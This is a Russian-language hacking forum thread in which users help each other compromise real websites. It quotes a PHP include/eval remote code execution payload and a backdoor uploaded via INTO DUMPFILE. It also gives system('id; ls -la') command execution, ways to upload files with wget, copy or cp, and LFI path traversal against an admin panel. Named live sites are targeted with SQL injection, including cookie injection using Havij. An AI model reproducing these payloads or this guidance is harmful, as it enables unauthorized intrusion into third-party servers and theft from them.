А можно через cmd залить? На команду Code: find . -type d -perm 777 -print ругнулся HTML: <b>Warning</b>: include_once() [<a href='function.include'>function.include</a>]: Failed opening 'modules/error_reporting(0);print `find . -type d -perm 777 -print`;///error_reporting(0);print `find . -type d -perm 777 -print`;//.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/xxx/public_html/includes/libs/ss.inc.php</b> on line <b>168</b><br /> но выдал все папки с правами на записью Какой командой можно залить файл, удаленно или локально?
Есле херня, аргументируй!!! в чем имено, cp - это функция копирования, линукса, онаже COPY на пхп, а как вы ее будите использовать это уже другой вопрос, требую аргументировать в чем херня!
Сначала пишешь вставить эвал, а потом юзаешь системные команды(непосресдтвенно через эвал), да еще и с неправильными аргументами...
если есть возможность, посмотри какие качалки есть, может WGET есть, ей и попробуй если через пхп то copy("куда", "откуда");, если локально то "cp <ЧТО> <КУДА>"
system \ passthru \ etc => system("cp <ЧТО> <КУДА>"); Но никак не просто в eval въебать cp. Может все-таки не будешь пугать людей?
Это LFI, и произвольное выполнение кода(Не команд). P.S. Писать не хотел, так как это элементарно, но winstrool попросил разобраться.
Это и произвольное выполнение кода и LFI. Но мне кажется, что "произвольное выполнение кода" как-то выгоднее нежели LFI, да и говорим мы не о LFI сейчас. https://forum.antichat.ru/showpost.php?p=2829300&postcount=18023 PHP: $app = $_POST['attachment']; ... include_once('modules/'.$app.'/'.$app.'.php'); ... $c_run = $app.'::ajax_post();'; ... eval($c_run); //EVAL!!1111 Code Execution Писать не хотел, так как это элементарно, но Расмус Лердорф попросил разобраться.
Подскажите пожалуйста, залил бекдор через into+dumpfile, но никак немогу найти доступные на запись папки, создал пхп инфо командой php?commanda=phpinfo(); Можно проинклудить. Но вот мб есть какая команда для просмотра врайтбл папок? Где то в этом разделе увидел такую конструкцию : php?commanda=ls -la но что неработает =) Спасибо ...
Боюсь спрашивать, но рискну: Как ты залил бэкдор через into+dumpfile, если не нашел директории доступной на запись? /tmp + include? Это во-первых. Во-вторых, ты, судя по всему, залил бэкдор с eval а ls -la это системная команда. Смотри вывод phpinfo(); смотри что прописано в директиве disabled_function, если там нету отключенных system \ passthru \ etc то используются соответсвенно не отчключенную команду: php?commanda=system('id; ls -la');
Я просто хотел узнать как можно найти доступные папки для записи, ибо бекдор можно залить и если нету прав на запись в диру. Например через модуль булки. За совет спасибо. Спасибо.
_http://wow.net.kg/^object=201388 нашел Cookie иньекцию,ввожу данные в Havij пишет что Target is vulnerable,уязвима,но.. Bypassing illegal union failed! Turning off this feature Как решить ?
нашел LFI, админку с авторизацией по .htaccess, добавлялку новостей... инклужу ее... Вылазит форма добавления с actionом <FORM method=post name=AddNews action='/main.phtml?act=add' enctype='multipart/form-data'> поидее, должен быть файл /adm/main.phtml - но при инклуде его выдает ошибку. меняю action на http://site/main.phtml?act=add&vuln=../../../../../../../../../../../../../../../../../***/htdocs/adm/admnews.phtml при добавление новости пишет "невозможно выполнить запрос". Что еще можно попробовать сделать?
скорей всего admnews.phtml инклюдит что-то еще, а так как ты инклюдишь этот скрипт с другой диры, то некоторые скрипты не подгружаются.
При http://nora-m.ru/index/2/product/220 тоже вылазит ошибка, так что, скорее всего в скрипте отсутствует уязвимость. Пардон, ошибся.Пробуй blind инъекцию